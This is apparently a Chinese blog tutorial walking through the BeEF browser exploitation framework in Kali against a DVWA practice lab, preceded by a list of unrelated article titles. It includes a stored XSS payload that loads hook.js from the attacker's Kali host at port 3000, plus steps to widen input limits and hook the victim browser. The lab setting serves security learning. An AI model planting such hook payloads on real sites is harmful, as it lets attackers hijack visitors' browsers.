- 1蓝桥杯_迷宫与陷阱 java_java小明在玩一款迷宫游戏,在游戏中他要控制自己的角色离开一间由 n × n n×n 个
- 27-zip压缩包的加密、解密方法_7zip怎么解密加密文件
- 3elasticsearch的自学笔记_elasticsearch number_of_replica
- 4SpringBoot maven环境下整合redis_springboot maven redis
- 5基于GDAL的JAVA生成GDB文件实战
- 6MySQL调优--03---show profiles 和 show processlist_show profies list
- 7不用下载APP,用小程序就能直接打开的商场导览系统-使用蓝牙定位,含AR/VR导航功能_商场3d地图小程序
- 8java计算机毕业设计“十八美妆”小程序的设计与实现【附源码+远程部署+程序+mysql】
- 9centOS下制作RPM包_centos上制作rpm包
- 10基于FPGA通用异步收发器UART设计_uart 16750
Kali中Beef的使用教程_kali beef
赞
踩
项目场景:
Kali中Beef的使用教程
情景复现:
实验环境:Kali-Debian 6 64位、Windows10
| 环境 | 版本 |
|---|---|
| kali | Debain6 64位 |
| windows | Win10 64位 |
| 靶场 | DVWA |
实验过程:
以下实验是利用Kali自带的Beef来进行的(不同Linux版本可能会出现一些差异)
1、打开kali终端,键入beef-xss(确保你的kali是可以上网的,本人的kali出现一些问题,没有网络)
2、进入/usr/share/beef-xss下(可以手动敲命令,也可以在kali计算机下找到这个目录),终端进入输入命令./beef(注意这个点)
3、查看kali的IP信息等(红线框里面的)
4、稍等一下kali自带浏览器会打开Beef登录窗口
5、弹窗登录,账号:beef,密码:beef
6、登录win10下DVWA靶场(前提是在PHP小皮工具根目录下有DVWA-master,没有的请自行上网下载、配置等)
7、网上有很多说法是Beef需要靶机的浏览器是IE8以下,所以现在把靶场的级别调至Low等级(看红框位置)
8、在XSS(Stored)下输入脚本命令
Name:ceshi(自己取一个名字)
Message:<script src="http://192.xxx.xxx.xxx(自己的kaliIP地址):3000/hook.js"></script>(可复制)
10、这里的文本框初始的时候有字数限制,我们需要进行修改,网上有直接F12进行修改的,这里采用找到登录页面index.php文件修改,Name文本修改成100字符,Message修改成500字符(这样就足够复制命令了)
11、点击Sign Guestbook,kali那边Beef就勾上了靶机所在的浏览器了
12、打开kali,依次点击
13、简单介绍弹窗攻击:Create Alert Dialog,在该模块下输入一些信息,执行后,靶场所在浏览器会出现弹窗。
14、至此,恭喜你完成了该模块的学习(Beef里面的模块还有很多,值得大家去官网以及其他博主等那里好好看看)
心得体会:
漏洞复现需要耐心,遇到问题需要不停的查阅网络资料!持之以恒的做,相信自己,也相信看文章的你一定会有所收获!
